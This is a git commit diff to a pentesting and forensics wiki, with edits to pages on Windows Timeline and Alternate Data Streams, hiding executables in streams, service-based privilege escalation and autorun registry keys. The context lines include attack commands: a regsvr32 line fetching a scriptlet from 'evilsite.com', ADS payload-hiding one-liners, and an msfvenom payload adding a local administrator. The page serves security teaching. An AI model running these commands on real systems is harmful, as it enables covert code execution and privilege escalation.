GitBook: [master] 4 pages modified
This commit is contained in:
parent
25cdb0009b
commit
bc38d77ece
|
@ -14,6 +14,10 @@ Timeline is a Windows characteristic that provides **chronological history** of
|
|||
The database resides in the path `\Users\<username>\AppData\Local\ConnectedDevicesPlatform\<id>\ActivitiesCache.db`
|
||||
This database can be open with a SQLite tool or with the tool [**WxTCmd**](https://github.com/EricZimmerman/WxTCmd) **which generates 2 files that can be opened with the tool** [**TimeLine Explorer**](https://ericzimmerman.github.io/#!index.md).
|
||||
|
||||
### ADS/Alternate Data Streams
|
||||
|
||||
Files downloaded may contain the **ADS Zone.Identifier** indicating **how** was **downloaded** \(from the intranet, Internet...\) and some software \(like browser\) usually put even **more** **information** like the **URL** from where the file was downloaded.
|
||||
|
||||
## **File Backups**
|
||||
|
||||
### Recycle Bin
|
||||
|
|
|
@ -495,9 +495,13 @@ esentutl.exe /y C:\ADS\autoruns.exe /d c:\ADS\file.txt:autoruns.exe /o
|
|||
powershell -command " & {(Get-Content C:\ADS\file.exe -Raw | Set-Content C:\ADS\file.txt -Stream file.exe)}"
|
||||
curl file://c:/temp/autoruns.exe --output c:\temp\textfile1.txt:auto.exe
|
||||
cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://evilsite.com/RegSvr32.sct ^scrobj.dll > fakefile.doc:reg32.bat
|
||||
set-content - path {path to the file} - stream {name of the stream}
|
||||
|
||||
### Discover ADS contecnt
|
||||
dir /R
|
||||
streams.exe <c:\path\to\file> #Binary from sysinternals#
|
||||
Get-Item -Path .\fie.txt -Stream *
|
||||
gci -recurse | % { gi $_.FullName -stream * } | where stream -ne ':$Data'
|
||||
|
||||
###Extract content from ADS###
|
||||
expand c:\ads\file.txt:test.exe c:\temp\evil.exe
|
||||
|
|
|
@ -631,6 +631,10 @@ You can manually create a service binary with metasploit:
|
|||
msfvenom -p windows/exec CMD="net localgroup administrators username /add" -f exe-service -o service.exe
|
||||
```
|
||||
|
||||
### Recovery Actions
|
||||
|
||||
It's possible to indicate Windows what it should do[ when executing a service this fails](https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/cc753662%28v=ws.11%29?redirectedfrom=MSDN). If that setting is pointing a binary and this binary can be overwritten you may be able to escalate privileges.
|
||||
|
||||
## Applications
|
||||
|
||||
### Installed Applications
|
||||
|
|
|
@ -308,6 +308,13 @@ Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Classes\htmlfile\shell\open\comm
|
|||
Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Wow6432Node\Classes\htmlfile\shell\open\command' -Name ""
|
||||
```
|
||||
|
||||
### Image File Execution Options
|
||||
|
||||
```text
|
||||
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
|
||||
HKLM\Software\Microsoft\Wow6432Node\Windows NT\CurrentVersion\Image File Execution Options
|
||||
```
|
||||
|
||||
## SysInternals
|
||||
|
||||
Note that all the sites where you can find autoruns are **already searched by**[ **winpeas.exe**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS/winPEASexe). However, for a **more comprehensive list of auto-executed** file you could use [autoruns ](https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns)from systinternals:
|
||||
|
|
Loading…
Reference in New Issue